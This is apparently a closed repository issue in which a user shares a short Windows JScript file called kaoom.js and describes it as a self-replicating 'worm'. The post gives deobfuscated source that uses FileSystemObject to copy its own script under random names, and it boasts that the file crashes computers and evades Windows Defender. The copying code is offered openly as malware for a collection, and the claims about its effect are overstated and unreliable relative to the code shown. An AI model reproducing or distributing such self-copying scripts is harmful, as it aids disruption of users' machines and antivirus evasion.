Closed theanonhackuk closed 1 year ago
var XFileSys = new ActiveXObject("Scripting.FileSystemObject"); // maybe the file manager function
var XScriptName = WScript.ScriptFullName; // Some random variable names
var a = 0; // Starts from 0
while (a < 10) { // Seems like a counter
a = a + 1;
var XFile = "ka00m" + Math.random().toString().replace(".", "") + ".js"; //
if (!XFileSys.FileExists(XFile )) {
XFileSys.CopyFile(XScriptName, XFile );
}
}
More readable deobfuscated file
+
Really cute worm i found somewhere on the internet that only have 10 lines of code and it can actually make your computer to collapse in some seconds/minutes. Its written in windows JS code, seems that windows deffender dont detect it as malicious.
https://antiscan.me/scan/new/result?id=xoY5kGYacDYc
Obfuscated
This is the original one, it was like this the file
Deobfuscated
Its named kaoom.js the file.
Result
Note
I think this isn't like a very advanced script that someone may massivly spread. I will just left it here if you want to add it to your repo.